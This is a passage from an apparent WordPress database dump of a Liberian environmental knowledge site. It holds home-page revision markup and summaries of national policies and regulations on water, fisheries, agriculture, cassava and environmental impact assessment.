data-bubble-link=\"\" data-segment-text=\"disaster risk reduction\">disaster risk reduction</span></span></span> into development, recovery and humanitarian response policy and plans; to contribute to national risk management applications for sustainable national development; and to strengthen disaster preparedness for effective emergency and recovery response.</span></span>','National Disaster Management Agency of Liberia','','inherit','closed','closed','','5163-revision-v1','','','2022-10-12 16:18:38','2022-10-12 16:18:38','',5163,'https://ekmsliberia.info/?p=5168',0,'revision','',0),(5173,38,'2022-10-18 09:08:37','2022-10-18 09:08:37','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"231\">Acts</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/document-library/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/10/Pic-for-inspector-story-370x265.jpeg\" alt=\"EPA Trains Environmental Inspectors On How To Monitor Impacts of High Voltage Transmission System\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\">EPA Trains Environmental Inspectors On How To Monitor Impacts of...</a></h4>Environmental inspectors and representatives of line government ministries, agencies and&hellip;\n	<a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-Environment1-370x265.jpg\" alt=\"Gov’t Launches State of Environment Report\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\">Gov’t Launches State of Environment Report</a></h4>The Government of Liberia through the Environmental Protection Agency of&hellip;\n	<a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/ekms--370x265.png\" alt=\"The Cross-Cutting Capacity Development Project Implemented by the EPA in collaboration with UNDP and Funded by GEF Conducts a 3-Day EKMS Training\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\">The Cross-Cutting Capacity Development Project Implemented by the EPA in...</a></h4>The Cross Cutting Capacity Development (CCCD) Project implemented by the&hellip;\n	<a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/motorbikes-370x265.png\" alt=\"EPA Donates two Thunder 2019 TH-125 GY motorbikes to the General Service Agency (GSA)\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\">EPA Donates two Thunder 2019 TH-125 GY motorbikes to the...</a></h4>The bikes were purchased and donated to the EPA by&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2022-10-18 09:08:37','2022-10-18 09:08:37','',9,'https://ekmsliberia.info/?p=5173',0,'revision','',0),(5174,38,'2022-10-18 09:08:37','2022-10-18 09:08:37','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"231\">Acts</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/document-library/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/10/Pic-for-inspector-story-370x265.jpeg\" alt=\"EPA Trains Environmental Inspectors On How To Monitor Impacts of High Voltage Transmission System\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system/\">EPA Trains Environmental Inspectors On How To Monitor Impacts of...</a></h4>Environmental inspectors and representatives of line government ministries, agencies and&hellip;\n	<a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/State-of-Environment1-370x265.jpg\" alt=\"Gov’t Launches State of Environment Report\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/govt-launches-state-of-environment-report/\">Gov’t Launches State of Environment Report</a></h4>The Government of Liberia through the Environmental Protection Agency of&hellip;\n	<a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/ekms--370x265.png\" alt=\"The Cross-Cutting Capacity Development Project Implemented by the EPA in collaboration with UNDP and Funded by GEF Conducts a 3-Day EKMS Training\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/the-cross-cutting-capacity-development-project-implemented-by-the-epa-in-collaboration-with-undp-and-funded-by-gef-conducts-a-3-day-ekms-training/\">The Cross-Cutting Capacity Development Project Implemented by the EPA in...</a></h4>The Cross Cutting Capacity Development (CCCD) Project implemented by the&hellip;\n	<a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/09/motorbikes-370x265.png\" alt=\"EPA Donates two Thunder 2019 TH-125 GY motorbikes to the General Service Agency (GSA)\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-donates-two-thunder-2019-th-125-gy-motorbikes-to-the-general-service-agency-gsa/\">EPA Donates two Thunder 2019 TH-125 GY motorbikes to the...</a></h4>The bikes were purchased and donated to the EPA by&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2022-10-18 09:08:37','2022-10-18 09:08:37','',9,'https://ekmsliberia.info/?p=5174',0,'revision','',0),(5175,38,'2022-10-18 09:08:38','2022-10-18 09:08:38','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n														Previous\n														Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"231\">Acts</option>\n	<option value=\"248\">Article</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"219\">Chemical</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"244\">Evaluation</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"242\">Handbook</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"243\">Survey</option>\n	<option value=\"89\">Toolkits</option>\n	<option value=\"217\">Water</option>\n</select>\n			<i>\n				<svg xmlns=\"http://www.w3.org/2000/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewBox=\"0 0 512 336.36\"><path fill-rule=\"nonzero\" d=\"M42.47.01 469.5 0C492.96 0 512 19.04 512 42.5c0 11.07-4.23 21.15-11.17 28.72L294.18 320.97c-14.93 18.06-41.7 20.58-59.76 5.65-1.8-1.49-3.46-3.12-4.97-4.83L10.43 70.39C-4.97 52.71-3.1 25.86 14.58 10.47 22.63 3.46 32.57.02 42.47.01z\"/></svg>\n			</i>	\n<button type=\"submit\" aria-label=\"search submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			<svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" fill=\"none\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M14.625 5.3999L16.3 7.0749L11.35 12.0249L16.3 16.9749L14.625 18.6499L7.99999 12.0249L14.625 5.3999Z\" fill=\"#0F172A\"/></svg></i>\",\"nextArrow\":\"<i class=\"jet-arrow-next jet-blog-arrow\"><svg width=\"24\" height=\"24\" viewBox=\"0 0 24 24\" fill=\"none\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M9.37501 18.6001L7.70001 16.9251L12.65 11.9751L7.70001 7.0251L9.37501 5.3501L16 11.9751L9.37501 18.6001Z\" fill=\"#0F172A\"/></svg></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/document-library/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberia-welcomes-four-chimpanzees-rescued-by-guinea-bissau-gol-fda-and-lcrp-provide-sanctuary-for-new-arrivals/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-1-370x265.jpg\" alt=\"Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA, and LCRP Provide Sanctuary for New Arrivals\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/liberia-welcomes-four-chimpanzees-rescued-by-guinea-bissau-gol-fda-and-lcrp-provide-sanctuary-for-new-arrivals/\">Liberia Welcomes Four Chimpanzees Rescued by Guinea-Bissau - GoL, FDA,...</a></h4>Authorities of the Forestry Development Authority (FDA) and Liberia Chimpanzee&hellip;\n	<a href=\"https://ekmsliberia.info/fda-partners-increase-public-awareness-to-fast-track-liberias-progress-on-redd/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/FDA-370x265.jpg\" alt=\"FDA &amp; Partners Increase Public Awareness to Fast-track Liberia’s Progress on REDD+\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-partners-increase-public-awareness-to-fast-track-liberias-progress-on-redd/\">FDA & Partners Increase Public Awareness to Fast-track Liberia’s Progress...</a></h4>The Forestry Development Authority (FDA) through the Liberia Forest Sector&hellip;\n	<a href=\"https://ekmsliberia.info/eu-funded-project-on-combating-wildlife-forest-crime-celebrates-achievements/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/fda-1-370x265.png\" alt=\"EU Funded Project on Combating Wildlife &amp; Forest Crime Celebrates Achievements\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/eu-funded-project-on-combating-wildlife-forest-crime-celebrates-achievements/\">EU Funded Project on Combating Wildlife & Forest Crime Celebrates...</a></h4>The Managing Director of the Forestry Development Authority (FDA), Hon.&hellip;\n	<a href=\"https://ekmsliberia.info/ministry-of-agriculture-distributes-over-one-million-cocoa-seedlings-in-lofa/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/MOA-1-370x265.jpg\" alt=\"Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in Lofa\" loading=\"lazy\" width=\"370\" height=\"265\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/ministry-of-agriculture-distributes-over-one-million-cocoa-seedlings-in-lofa/\">Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in...</a></h4>The Ministry of Agriculture, through its the Tree Crops Extension&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2022-10-18 09:08:38','2022-10-18 09:08:38','',9,'https://ekmsliberia.info/?p=5175',0,'revision','',0),(5176,38,'2022-10-18 09:09:15','2022-10-18 09:09:15','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-kava-child','','','2022-10-18 09:09:15','2022-10-18 09:09:15','',0,'https://ekmsliberia.info/wp-global-styles-kava-child/',0,'wp_global_styles','',0),(5183,42,'2022-12-06 10:35:25','2022-12-06 10:35:25','The final draft of the Cassava Sector Strategy was validated in July 2010 during a meeting attended by all the stakeholders in the value chain.\r\n\r\nIn Liberia, Cassava is the second most important food crop. It is grown throughout the country, although the area covered may vary considerably for different counties. A survey conducted by the Liberian Ministry of Agriculture in 1978 indicated that the total area covered by the crop in 1977 was only 86 000 ha with an average yield of 1800 kg/ha, and that 39 400 or 26 percent of all agricultural households in the country were involved in the production of cassava.','Liberia National Cassava Sector Strategy','','inherit','closed','closed','','1766-revision-v1','','','2022-12-06 10:35:25','2022-12-06 10:35:25','',1766,'https://ekmsliberia.info/?p=5183',0,'revision','',0),(5184,42,'2022-12-06 10:39:59','2022-12-06 10:39:59','This zip file consist of various FDA regulations in Liberia including Wildlife export, Charcoal, Power saw ban, etc.','FDA Regulations','','inherit','closed','closed','','1713-revision-v1','','','2022-12-06 10:39:59','2022-12-06 10:39:59','',1713,'https://ekmsliberia.info/?p=5184',0,'revision','',0),(5185,42,'2022-12-06 10:40:30','2022-12-06 10:40:30','Liberia is endowed with abundant rainfall and easily accessible groundwater in most areas. Its fresh water, like everywhere else globally, is a natural resource vital for human survival, socio-economic development and maintenance of the environment. The resource is finite and vulnerable and there are already worrying cases of pollution and degradation of national water resources afflicted by both natural and human factors.\r\n\r\nThe water resource potential of the country is enormous but lacks adequate and proper management. This situation has been exacerbated by the effects of the civil war just ended.\r\nThere is, therefore, a compelling need for a well coordinated and integrated approach for the development and management of the nation’s water resources (Integrated Water Resources Management). Moreover, a framework is required through which priorities can be established and the protection and optimal use of the water resources planned and implemented.\r\n\r\nAlong with the poor access to adequate sanitation and the contamination of water bodies by domestic waste, the Government is concerned that most of its population does not have access to clean and safe drinking water. The major challenge is to ensure that this social service is delivered to everyone.\r\n\r\nThe country’s reconstruction program and the need for environmental management demand that attention be paid to the problems of water resources management. These resources can be harnessed to make a significant contribution to the national economy thereby making the benefits accessible to the citizenry of Liberia.\r\n\r\nThe urgency for an integrated approach to water resources management with full coordination between the water related sectors cannot be over-stated. Unlike in the past, Liberia now has its first comprehensive National Integrated Water Resources Management Policy.\r\n\r\nThis policy will guide development efforts aimed at achieving the maximum net benefit from these resources in a sustainable manner for the livelihood of present and future generations. It also addresses current water management issues and adopts the objectives and strategies envisaged in the Millennium Development Goals. In addition, the policy and strategies have been set against the Government\'s overall goals for social and economic development, as well as the democratic, decentralization approach to development.\r\n\r\nThe sustainable development and national utilization of the water resources are our collective responsibility; it requires commitment, political will and shared vision.','National Integrated Water Resources Management Policy','','inherit','closed','closed','','1711-revision-v1','','','2022-12-06 10:40:30','2022-12-06 10:40:30','',1711,'https://ekmsliberia.info/?p=5185',0,'revision','',0),(5186,42,'2022-12-06 10:41:04','2022-12-06 10:41:04','This is the FDA Regulation No. 113-08, Regulations on Environmental Impact Assessment.','Regulations on Environmental Impact Assessment','','inherit','closed','closed','','1720-autosave-v1','','','2022-12-06 10:41:04','2022-12-06 10:41:04','',1720,'https://ekmsliberia.info/?p=5186',0,'revision','',0),(5187,42,'2022-12-06 10:41:27','2022-12-06 10:41:27','This is the FDA Regulation No. 113-08, Regulations on Environmental Impact Assessment.','Regulations on Environmental Impact Assessment','','inherit','closed','closed','','1720-revision-v1','','','2022-12-06 10:41:27','2022-12-06 10:41:27','',1720,'https://ekmsliberia.info/?p=5187',0,'revision','',0),(5188,42,'2022-12-06 10:41:51','2022-12-06 10:41:51','This manual is a result of the joint effort of the Environmental Protection Agency and the national stakeholders including line ministries/agencies and the private sectors. The intention is to provide the EPA, sector agencies, private sector, NGOs, members of the public and consultants a set of approved guidelines for the conduct and review of Environmental Impact Assessments (EIA) in Liberia.\r\n\r\nThe need to have clear guidance on the EIA process has been evident since the establishment of the EPA. EIA is a means of identifying and planning for the avoidance or minimization of environmental impacts that may arise from development and exploitation of resources, and ensuring sustainable development. It will also be customized to reflect issues that are relevant and specific to projects. While not exhaustive, the guidelines are meant to complement other sectoral EIA guidelines which may be produced by the EPA from time to time.\r\n\r\nThe Environmental Protection and Management Law (EPML) provide for a wide ranging responsibility for environmental management by the EPA. One of the most prominent issues is the need for development of administrative procedures for the preparation of EIA to ensure effective environmental governance. The required administrative procedures and how they are arranged to reflect the intent of the law is the subject of the following guidelines. These Guidelines will be reviewed periodically when necessary.','Environmental Impact Assessment Procedural Guidelines','','inherit','closed','closed','','1718-revision-v1','','','2022-12-06 10:41:51','2022-12-06 10:41:51','',1718,'https://ekmsliberia.info/?p=5188',0,'revision','',0),(5189,42,'2022-12-06 10:42:26','2022-12-06 10:42:26','Purpose of Act: It shall be the purpose of this Chapter to prevent entry into Liberia of injurious plant and animal pests and diseases existing in foreign countries; to prevent the spread of such pests and diseases should they become established in Liberia; and to regulate the export of plants and animals to conserve dwindling species and protect the food supplies of the Republic.','Agriculture Law - Title 3 - Liberian Code of Laws Revised','','inherit','closed','closed','','1715-revision-v1','','','2022-12-06 10:42:26','2022-12-06 10:42:26','',1715,'https://ekmsliberia.info/?p=5189',0,'revision','',0),(5190,42,'2022-12-06 10:43:11','2022-12-06 10:43:11','A new regulation for the Marine Fisheries Sector in the Republic of Liberia.\r\n\r\nRegulations made by the Minister of Agriculture in the exercise of the powers conferred upon the office by section 105 of Chapter 4, Sub-chapter C of Title 24 of the Laws of The Republic of Liberia (the Natural Resources Law, 1958) and approved as required by such Law and having effect from this 1st day of October A.D. 2010.','The New Fisheries Regulations','','inherit','closed','closed','','1726-revision-v1','','','2022-12-06 10:43:11','2022-12-06 10:43:11','',1726,'https://ekmsliberia.info/?p=5190',0,'revision','',0),(5191,42,'2022-12-06 10:43:36','2022-12-06 10:43:36','Liberia\'s fisheries resources are a national asset and part of our heritage therefore it is our responsibility to manage and develop them for the benefit of the country as a whole, especially for those communities upon which their livelihoods depend. If we are able to achieve this, fish has the potential to make a significant contribution to the social and economic development and wellbeing of our nation. Implementing this policy and strategy is a\r\nmajor step that we take together to achieve this vision.\r\n\r\nAs I look back over the years I see that we have achieved some milestones, particularly in the area of overcoming illegal fishing in our Fisheries Waters. Liberia, a few years ago, was subjected to an annual loss of over US$12.0 million through illegal fishing. This loss has recently significantly minimized, as a result of our relentless struggle in confronting illegal fishing, and bringing perpetrators to account. The fish resources that used to be stolen are now available for our small-scale fishers or foreign vessels that pay for the rights to fish.\r\n\r\nThese positive steps provide us with great hope for the future – a future that within this policy has been underpinned by Article 7 of the Constitution of the Republic of Liberia.\r\nThe fisheries and aquaculture policy sets out objectives for us to strengthen community stewardship of fishery resources and to support the development of up-and-down stream commercial activities. It promotes the development of sustainable aquaculture for subsistence and commercial purposes to provide more fish for food and jobs. In our industrial fisheries, we will tread with caution and establish a just rights allocation system to encourage economically viable, efficient and sustainable fisheries.\r\n\r\nThe policy recognizes the safety net that fisheries provide for our poorest people. I am abundantly aware that at a time when climate change is upon us, we need to improve the resilience of our most vulnerable people to change. However, we must also be mindful that the social and economic benefits derived from the sector are dependent on long-term ecological sustainability, so we need to implement strategies that encourage responsible use of the ecosystem.\r\n\r\nThis policy has been developed based on home grown practical experiences, captured through country-wide consultations, and best practice examples drawn from international experiences. This blend of experience and knowledge, if implemented in the spirit of our guiding principles – equity, sustainability, transparency, optimality, and inclusiveness – will provide us with the pathway to prosperity.','Fisheries and Aquaculture Sector Policy and 